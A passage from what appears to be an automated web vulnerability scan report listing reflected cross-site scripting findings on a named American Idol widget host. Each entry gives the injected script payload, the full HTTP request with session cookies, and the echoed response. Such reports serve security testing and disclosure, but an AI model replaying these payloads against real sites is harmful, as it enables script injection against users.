Cookie: optimizelyEndUserId=oeu1317753405502r0.8151182061992586; ATA=ign.131775336947702.50.23.123.106; s_vi=[CS]v1|2745A90C850101BD-40000105605A2661[CE]; __utma=173446715.1859606147.1317753406.1317756133.1317758813.3; __utmz=173446715.1317758813.3.3.utmcsr=newscorp.com|utmccn=(referral)|utmcmd=referral|utmcct=/operations/other.html; s_pers=%20s_nr%3D1317753576005%7C1320345576005%3B%20s_lv%3D1317765782922%7C1412373782922%3B%20s_lv_s%3DLess%2520than%25201%2520day%7C1317767582922%3B; s_sess=%20s_cc%3Dtrue%3B%20s_v13%3Dstitial.ign.com%253Aburp%3B%20s_c13%3Dstitial.ign.com%253Aburp%3B%20s_sq%3D%3B; decc=US; NGUserID=a5d4238-2364-1857667316-7; i18n-cc=US; freq=c-1317765778922v-1n-12mc+1317765778922mv+1mn+12wwe~0; optimizelyBuckets=%7B%228445302%22%3A8453327%7D; rsi_segs=

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (CentOS) PHP/5.3.3
X-Powered-By: PHP/5.3.3
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 1769
Accept-Ranges: bytes
X-Varnish: 1916941921
Expires: Tue, 04 Oct 2011 22:05:20 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 04 Oct 2011 22:05:20 GMT
Connection: close

jsonp1317765904246844f6<script>alert(1)</script>5e7756dfe2d("<script type=\"text\/javascript\">var cssNode = document.createElement('link');cssNode.type = 'text\/css';cssNode.rel = 'stylesheet';cssNod
...[SNIP]...

1.83. http://widgets.myidol.americanidol.com/js/recentActivity/view [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://widgets.myidol.americanidol.com
Path:	/js/recentActivity/view

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 90673'><script>alert(1)</script>58610e30d1f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /js90673'><script>alert(1)</script>58610e30d1f/recentActivity/view?one_widget_node=myidol.americanidol.com&devkey=aidoldevkey&cookieFailInstantRedirect=true&num=10&view=network&title=Network&wsetup=true&wurl=http%3A//www.americanidol.com/&ms=1317758766 HTTP/1.1
Host: widgets.myidol.americanidol.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.americanidol.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2745A99E051D1536-4000010A2004AB28[CE]; s_pers=%20s_vnum%3D1320123600884%2526vn%253D2%7C1320123600884%3B%20s_invisit%3Dtrue%7C1317758036006%3B%20s_dayslastvisit%3D1317756236014%7C1412364236014%3B%20s_dayslastvisit_s%3DLess%2520than%25201%2520day%7C1317758036014%3B; core_u=faa976043c793de66165b83afd81de19; core_x=3e3d8fc3a1227dd8404b22789c1bc64d; core_anon=1; session_exp=0; __utma=124250778.1498354944.1317753547.1317756115.1317758789.3; __utmb=124250778.2.10.1317758789; __utmc=124250778; __utmz=124250778.1317758789.3.3.utmcsr=newscorp.com|utmccn=(referral)|utmcmd=referral|utmcct=/operations/other.html

Response (redirected)

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html
Vary: Accept-Encoding
Expires: Tue, 04 Oct 2011 20:10:15 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 04 Oct 2011 20:10:15 GMT
Content-Length: 1518
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title>Whoops! Browser Settin
...[SNIP]...
<a href='http://widgets.myidol.americanidol.com/js90673'><script>alert(1)</script>58610e30d1f/recentActivity/view?one_widget_node=myidol.americanidol.com&devkey=aidoldevkey&cookieFailInstantRedirect=true&num=10&view=network&title=Network&wsetup=true&wurl=http%3A//www.americanidol.com/&ms=13177
...[SNIP]...

1.84. http://widgets.myidol.americanidol.com/js/recentActivity/view [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://widgets.myidol.americanidol.com
Path:	/js/recentActivity/view

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 7dd22'><script>alert(1)</script>127ff36c659 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /js/recentActivity7dd22'><script>alert(1)</script>127ff36c659/view?one_widget_node=myidol.americanidol.com&devkey=aidoldevkey&cookieFailInstantRedirect=true&num=10&view=network&title=Network&wsetup=true&wurl=http%3A//www.americanidol.com/&ms=1317758766 HTTP/1.1
Host: widgets.myidol.americanidol.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.americanidol.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2745A99E051D1536-4000010A2004AB28[CE]; s_pers=%20s_vnum%3D1320123600884%2526vn%253D2%7C1320123600884%3B%20s_invisit%3Dtrue%7C1317758036006%3B%20s_dayslastvisit%3D1317756236014%7C1412364236014%3B%20s_dayslastvisit_s%3DLess%2520than%25201%2520day%7C1317758036014%3B; core_u=faa976043c793de66165b83afd81de19; core_x=3e3d8fc3a1227dd8404b22789c1bc64d; core_anon=1; session_exp=0; __utma=124250778.1498354944.1317753547.1317756115.1317758789.3; __utmb=124250778.2.10.1317758789; __utmc=124250778; __utmz=124250778.1317758789.3.3.utmcsr=newscorp.com|utmccn=(referral)|utmcmd=referral|utmcct=/operations/other.html

Response (redirected)

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html
Vary: Accept-Encoding
Expires: Tue, 04 Oct 2011 20:10:17 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 04 Oct 2011 20:10:17 GMT
Content-Length: 1518
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title>Whoops! Browser Settin
...[SNIP]...
<a href='http://widgets.myidol.americanidol.com/js/recentActivity7dd22'><script>alert(1)</script>127ff36c659/view?one_widget_node=myidol.americanidol.com&devkey=aidoldevkey&cookieFailInstantRedirect=true&num=10&view=network&title=Network&wsetup=true&wurl=http%3A//www.americanidol.com/&ms=1317758766'>
...[SNIP]...

1.85. http://widgets.myidol.americanidol.com/js/recentActivity/view [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://widgets.myidol.americanidol.com
Path:	/js/recentActivity/view

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 97b0e'><script>alert(1)</script>6b191eb13af was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /js/recentActivity/view97b0e'><script>alert(1)</script>6b191eb13af?one_widget_node=myidol.americanidol.com&devkey=aidoldevkey&cookieFailInstantRedirect=true&num=10&view=network&title=Network&wsetup=true&wurl=http%3A//www.americanidol.com/&ms=1317758766 HTTP/1.1
Host: widgets.myidol.americanidol.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.americanidol.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2745A99E051D1536-4000010A2004AB28[CE]; s_pers=%20s_vnum%3D1320123600884%2526vn%253D2%7C1320123600884%3B%20s_invisit%3Dtrue%7C1317758036006%3B%20s_dayslastvisit%3D1317756236014%7C1412364236014%3B%20s_dayslastvisit_s%3DLess%2520than%25201%2520day%7C1317758036014%3B; core_u=faa976043c793de66165b83afd81de19; core_x=3e3d8fc3a1227dd8404b22789c1bc64d; core_anon=1; session_exp=0; __utma=124250778.1498354944.1317753547.1317756115.1317758789.3; __utmb=124250778.2.10.1317758789; __utmc=124250778; __utmz=124250778.1317758789.3.3.utmcsr=newscorp.com|utmccn=(referral)|utmcmd=referral|utmcct=/operations/other.html

Response (redirected)

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html
Vary: Accept-Encoding
Expires: Tue, 04 Oct 2011 20:10:19 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 04 Oct 2011 20:10:19 GMT
Content-Length: 1518
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title>Whoops! Browser Settin
...[SNIP]...
<a href='http://widgets.myidol.americanidol.com/js/recentActivity/view97b0e'><script>alert(1)</script>6b191eb13af?one_widget_node=myidol.americanidol.com&devkey=aidoldevkey&cookieFailInstantRedirect=true&num=10&view=network&title=Network&wsetup=true&wurl=http%3A//www.americanidol.com/&ms=1317758766'>
...[SNIP]...

1.86. http://widgets.myidol.americanidol.com/js/recentActivity/view [cookieFailInstantRedirect parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://widgets.myidol.americanidol.com
Path:	/js/recentActivity/view

Issue detail

The value of the cookieFailInstantRedirect request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 49218'><script>alert(1)</script>32d40dc9b9 was submitted in the cookieFailInstantRedirect parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /js/recentActivity/view?one_widget_node=myidol.americanidol.com&devkey=aidoldevkey&cookieFailInstantRedirect=true49218'><script>alert(1)</script>32d40dc9b9&num=10&view=network&title=Network&wsetup=true&wurl=http%3A//www.americanidol.com/&ms=1317758766 HTTP/1.1
Host: widgets.myidol.americanidol.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.americanidol.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2745A99E051D1536-4000010A2004AB28[CE]; s_pers=%20s_vnum%3D1320123600884%2526vn%253D2%7C1320123600884%3B%20s_invisit%3Dtrue%7C1317758036006%3B%20s_dayslastvisit%3D1317756236014%7C1412364236014%3B%20s_dayslastvisit_s%3DLess%2520than%25201%2520day%7C1317758036014%3B; core_u=faa976043c793de66165b83afd81de19; core_x=3e3d8fc3a1227dd8404b22789c1bc64d; core_anon=1; session_exp=0; __utma=124250778.1498354944.1317753547.1317756115.1317758789.3; __utmb=124250778.2.10.1317758789; __utmc=124250778; __utmz=124250778.1317758789.3.3.utmcsr=newscorp.com|utmccn=(referral)|utmcmd=referral|utmcct=/operations/other.html

Response (redirected)

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html
Vary: Accept-Encoding
Expires: Tue, 04 Oct 2011 20:09:32 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 04 Oct 2011 20:09:32 GMT
Content-Length: 1517
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title>Whoops! Browser Settin
...[SNIP]...
<a href='http://widgets.myidol.americanidol.com/js/recentActivity/view?one_widget_node=myidol.americanidol.com&devkey=aidoldevkey&cookieFailInstantRedirect=true49218'><script>alert(1)</script>32d40dc9b9&num=10&view=network&title=Network&wsetup=true&wurl=http%3A//www.americanidol.com/&ms=1317758766'>
...[SNIP]...

1.87. http://widgets.myidol.americanidol.com/js/recentActivity/view [devkey parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://widgets.myidol.americanidol.com
Path:	/js/recentActivity/view

Issue detail

The value of the devkey request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 48fc0'><script>alert(1)</script>41365e5e216 was submitted in the devkey parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /js/recentActivity/view?one_widget_node=myidol.americanidol.com&devkey=aidoldevkey48fc0'><script>alert(1)</script>41365e5e216&cookieFailInstantRedirect=true&num=10&view=network&title=Network&wsetup=true&wurl=http%3A//www.americanidol.com/&ms=1317758766 HTTP/1.1
Host: widgets.myidol.americanidol.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.americanidol.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2745A99E051D1536-4000010A2004AB28[CE]; s_pers=%20s_vnum%3D1320123600884%2526vn%253D2%7C1320123600884%3B%20s_invisit%3Dtrue%7C1317758036006%3B%20s_dayslastvisit%3D1317756236014%7C1412364236014%3B%20s_dayslastvisit_s%3DLess%2520than%25201%2520day%7C1317758036014%3B; core_u=faa976043c793de66165b83afd81de19; core_x=3e3d8fc3a1227dd8404b22789c1bc64d; core_anon=1; session_exp=0; __utma=124250778.1498354944.1317753547.1317756115.1317758789.3; __utmb=124250778.2.10.1317758789; __utmc=124250778; __utmz=124250778.1317758789.3.3.utmcsr=newscorp.com|utmccn=(referral)|utmcmd=referral|utmcct=/operations/other.html

Response (redirected)

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html
Vary: Accept-Encoding
Expires: Tue, 04 Oct 2011 20:09:30 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 04 Oct 2011 20:09:30 GMT
Content-Length: 1518
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title>Whoops! Browser Settin
...[SNIP]...
<a href='http://widgets.myidol.americanidol.com/js/recentActivity/view?one_widget_node=myidol.americanidol.com&devkey=aidoldevkey48fc0'><script>alert(1)</script>41365e5e216&cookieFailInstantRedirect=true&num=10&view=network&title=Network&wsetup=true&wurl=http%3A//www.americanidol.com/&ms=1317758766'>
...[SNIP]...

1.88. http://widgets.myidol.americanidol.com/js/recentActivity/view [ms parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://widgets.myidol.americanidol.com
Path:	/js/recentActivity/view

Issue detail

The value of the ms request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 25fee'><script>alert(1)</script>0b8b3d804a3 was submitted in the ms parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /js/recentActivity/view?one_widget_node=myidol.americanidol.com&devkey=aidoldevkey&cookieFailInstantRedirect=true&num=10&view=network&title=Network&wsetup=true&wurl=http%3A//www.americanidol.com/&ms=131775876625fee'><script>alert(1)</script>0b8b3d804a3 HTTP/1.1
Host: widgets.myidol.americanidol.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.americanidol.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2745A99E051D1536-4000010A2004AB28[CE]; s_pers=%20s_vnum%3D1320123600884%2526vn%253D2%7C1320123600884%3B%20s_invisit%3Dtrue%7C1317758036006%3B%20s_dayslastvisit%3D1317756236014%7C1412364236014%3B%20s_dayslastvisit_s%3DLess%2520than%25201%2520day%7C1317758036014%3B; core_u=faa976043c793de66165b83afd81de19; core_x=3e3d8fc3a1227dd8404b22789c1bc64d; core_anon=1; session_exp=0; __utma=124250778.1498354944.1317753547.1317756115.1317758789.3; __utmb=124250778.2.10.1317758789; __utmc=124250778; __utmz=124250778.1317758789.3.3.utmcsr=newscorp.com|utmccn=(referral)|utmcmd=referral|utmcct=/operations/other.html

Response (redirected)

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html
Vary: Accept-Encoding
Expires: Tue, 04 Oct 2011 20:09:46 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 04 Oct 2011 20:09:46 GMT
Content-Length: 1518
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title>Whoops! Browser Settin
...[SNIP]...
ntActivity/view?one_widget_node=myidol.americanidol.com&devkey=aidoldevkey&cookieFailInstantRedirect=true&num=10&view=network&title=Network&wsetup=true&wurl=http%3A//www.americanidol.com/&ms=131775876625fee'><script>alert(1)</script>0b8b3d804a3'>
...[SNIP]...

1.89. http://widgets.myidol.americanidol.com/js/recentActivity/view [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://widgets.myidol.americanidol.com
Path:	/js/recentActivity/view

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 872cd'><script>alert(1)</script>287b5cb03b8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /js/recentActivity/view?one_widget_node=myidol.americanidol.com&devkey=aidoldevkey&cookieFailInstantRedirect=true&num=10&view=network&title=Network&wsetup=true&wurl=http%3A//www.americanidol.com/&ms=1317758766&872cd'><script>alert(1)</script>287b5cb03b8=1 HTTP/1.1
Host: widgets.myidol.americanidol.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.americanidol.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2745A99E051D1536-4000010A2004AB28[CE]; s_pers=%20s_vnum%3D1320123600884%2526vn%253D2%7C1320123600884%3B%20s_invisit%3Dtrue%7C1317758036006%3B%20s_dayslastvisit%3D1317756236014%7C1412364236014%3B%20s_dayslastvisit_s%3DLess%2520than%25201%2520day%7C1317758036014%3B; core_u=faa976043c793de66165b83afd81de19; core_x=3e3d8fc3a1227dd8404b22789c1bc64d; core_anon=1; session_exp=0; __utma=124250778.1498354944.1317753547.1317756115.1317758789.3; __utmb=124250778.2.10.1317758789; __utmc=124250778; __utmz=124250778.1317758789.3.3.utmcsr=newscorp.com|utmccn=(referral)|utmcmd=referral|utmcct=/operations/other.html

Response (redirected)

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html
Vary: Accept-Encoding
Expires: Tue, 04 Oct 2011 20:10:09 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 04 Oct 2011 20:10:09 GMT
Content-Length: 1521
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title>Whoops! Browser Settin
...[SNIP]...
tActivity/view?one_widget_node=myidol.americanidol.com&devkey=aidoldevkey&cookieFailInstantRedirect=true&num=10&view=network&title=Network&wsetup=true&wurl=http%3A//www.americanidol.com/&ms=1317758766&872cd'><script>alert(1)</script>287b5cb03b8=1'>
...[SNIP]...

1.90. http://widgets.myidol.americanidol.com/js/recentActivity/view [num parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://widgets.myidol.americanidol.com
Path:	/js/recentActivity/view

Issue detail

The value of the num request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload f3c22'><script>alert(1)</script>21135ca7561 was submitted in the num parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /js/recentActivity/view?one_widget_node=myidol.americanidol.com&devkey=aidoldevkey&cookieFailInstantRedirect=true&num=10f3c22'><script>alert(1)</script>21135ca7561&view=network&title=Network&wsetup=true&wurl=http%3A//www.americanidol.com/&ms=1317758766 HTTP/1.1
Host: widgets.myidol.americanidol.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.americanidol.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2745A99E051D1536-4000010A2004AB28[CE]; s_pers=%20s_vnum%3D1320123600884%2526vn%253D2%7C1320123600884%3B%20s_invisit%3Dtrue%7C1317758036006%3B%20s_dayslastvisit%3D1317756236014%7C1412364236014%3B%20s_dayslastvisit_s%3DLess%2520than%25201%2520day%7C1317758036014%3B; core_u=faa976043c793de66165b83afd81de19; core_x=3e3d8fc3a1227dd8404b22789c1bc64d; core_anon=1; session_exp=0; __utma=124250778.1498354944.1317753547.1317756115.1317758789.3; __utmb=124250778.2.10.1317758789; __utmc=124250778; __utmz=124250778.1317758789.3.3.utmcsr=newscorp.com|utmccn=(referral)|utmcmd=referral|utmcct=/operations/other.html

Response (redirected)

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html
Vary: Accept-Encoding
Expires: Tue, 04 Oct 2011 20:09:34 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 04 Oct 2011 20:09:34 GMT
Content-Length: 1518
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title>Whoops! Browser Settin
...[SNIP]...
<a href='http://widgets.myidol.americanidol.com/js/recentActivity/view?one_widget_node=myidol.americanidol.com&devkey=aidoldevkey&cookieFailInstantRedirect=true&num=10f3c22'><script>alert(1)</script>21135ca7561&view=network&title=Network&wsetup=true&wurl=http%3A//www.americanidol.com/&ms=1317758766'>
...[SNIP]...

1.91. http://widgets.myidol.americanidol.com/js/recentActivity/view [one_widget_node parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://widgets.myidol.americanidol.com
Path:	/js/recentActivity/view

Issue detail

The value of the one_widget_node request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload d0f1d'><script>alert(1)</script>fde0836013d was submitted in the one_widget_node parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /js/recentActivity/view?one_widget_node=myidol.americanidol.comd0f1d'><script>alert(1)</script>fde0836013d&devkey=aidoldevkey&cookieFailInstantRedirect=true&num=10&view=network&title=Network&wsetup=true&wurl=http%3A//www.americanidol.com/&ms=1317758766 HTTP/1.1
Host: widgets.myidol.americanidol.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.americanidol.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2745A99E051D1536-4000010A2004AB28[CE]; s_pers=%20s_vnum%3D1320123600884%2526vn%253D2%7C1320123600884%3B%20s_invisit%3Dtrue%7C1317758036006%3B%20s_dayslastvisit%3D1317756236014%7C1412364236014%3B%20s_dayslastvisit_s%3DLess%2520than%25201%2520day%7C1317758036014%3B; core_u=faa976043c793de66165b83afd81de19; core_x=3e3d8fc3a1227dd8404b22789c1bc64d; core_anon=1; session_exp=0; __utma=124250778.1498354944.1317753547.1317756115.1317758789.3; __utmb=124250778.2.10.1317758789; __utmc=124250778; __utmz=124250778.1317758789.3.3.utmcsr=newscorp.com|utmccn=(referral)|utmcmd=referral|utmcct=/operations/other.html

Response (redirected)

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html
Vary: Accept-Encoding
Expires: Tue, 04 Oct 2011 20:09:28 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 04 Oct 2011 20:09:28 GMT
Content-Length: 1518
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title>Whoops! Browser Settin
...[SNIP]...
<a href='http://widgets.myidol.americanidol.com/js/recentActivity/view?one_widget_node=myidol.americanidol.comd0f1d'><script>alert(1)</script>fde0836013d&devkey=aidoldevkey&cookieFailInstantRedirect=true&num=10&view=network&title=Network&wsetup=true&wurl=http%3A//www.americanidol.com/&ms=1317758766'>
...[SNIP]...

1.92. http://widgets.myidol.americanidol.com/js/recentActivity/view [title parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://widgets.myidol.americanidol.com
Path:	/js/recentActivity/view

Issue detail

The value of the title request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload d7706'><script>alert(1)</script>7290e7f0327 was submitted in the title parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /js/recentActivity/view?one_widget_node=myidol.americanidol.com&devkey=aidoldevkey&cookieFailInstantRedirect=true&num=10&view=network&title=Networkd7706'><script>alert(1)</script>7290e7f0327&wsetup=true&wurl=http%3A//www.americanidol.com/&ms=1317758766 HTTP/1.1
Host: widgets.myidol.americanidol.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.americanidol.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
